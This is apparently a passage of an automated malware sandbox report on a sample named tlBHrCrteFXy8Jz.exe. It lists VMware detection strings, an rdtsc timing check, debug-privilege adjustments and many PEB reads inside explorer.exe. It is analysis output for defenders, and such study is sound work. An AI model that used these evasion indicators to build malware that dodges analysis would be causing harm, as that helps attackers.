            Source: explorer.exe, 0000000D.00000000.322692727.000000000EDF0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}WCCAWLGRE.jpg.l
            Source: explorer.exe, 0000000D.00000000.353740473.0000000008ACF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
            Source: explorer.exe, 0000000D.00000000.354025996.0000000008B4E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
            Source: explorer.exe, 0000000D.00000000.353740473.0000000008ACF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
            Source: explorer.exe, 0000000D.00000000.404874828.00000000069DA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD002
            Source: explorer.exe, 0000000D.00000000.322692727.000000000EDF0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f563
            Source: explorer.exe, 0000000D.00000000.322692727.000000000EDF0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI
            Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.302694736.0000000003311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeCode function: 11_2_004088C0 rdtsc
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\explorer.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0521AD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052DE539 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05223D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05223D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05223D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05223D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05223D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05223D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05223D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05223D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05223D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05223D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05223D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05223D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05223D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052E8D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0529A537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05244D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05244D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05244D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0523C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0523C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05253D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05293540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052C3D40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05237D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052E05AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052E05AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052435A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05241DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05241DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05241DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05242581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05242581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05242581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05242581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05212D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05212D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05212D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05212D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05212D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0524FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0524FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0522D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0522D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052DFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052DFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052DFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052DFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052C8DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05296DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05296DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05296DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05296DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05296DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05296DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0524BC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052E740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052E740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052E740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05296C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05296C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05296C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05296C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052D1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052D1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052D1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052D1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052D1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052D1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052D1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052D1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052D1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052D1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052D1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052D1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052D1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052D1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0523746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0524A44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052AC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052AC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0522849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052D14FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05296CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05296CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05296CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052E8CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05214F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05214F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0524E730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0523B73D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0523B73D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052E070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052E070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0524A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0524A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0523F716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052AFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052AFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0522FF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052E8F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0522EF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05228794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05297794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05297794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05297794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052537F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0521E620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052CFE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0521C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0521C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0521C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05248E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052D1608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0524A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0524A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0522766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0523AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0523AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0523AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0523AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0523AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05227E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05227E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05227E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05227E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05227E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05227E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052DAE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052DAE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052E0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052E0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052E0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052946A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052AFE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052276E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052416E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05258EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052436CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052CFEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052E8ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05234120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05234120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05234120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05234120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05234120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0524513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0524513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05219100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05219100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05219100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0521C962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0521B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0521B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0523B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0523B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052461A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052461A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052D49A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052D49A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052D49A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052D49A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052969A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052951BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052951BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052951BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052951BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052399BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052399BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052399BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052399BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052399BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052399BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052399BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052399BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052399BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052399BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052399BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052399BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0523C182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0524A185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05242990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0521B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0521B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0521B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052A41E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0522B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0522B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0522B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0522B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0524002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0524002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0524002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0524002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0524002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0523A830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0523A830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0523A830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0523A830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052E4015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052E4015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05297016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05297016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05297016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052E1074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052D2073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05230050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05230050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052420A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052420A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052420A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052420A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052420A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052420A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052590AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0524F0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0524F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0524F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05219080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05293884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05293884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052140E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052140E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052140E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0523B8E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0523B8E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052158EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052AB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052AB8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052AB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052AB8D0 mov eax, dword ptr fs:[00000030h]
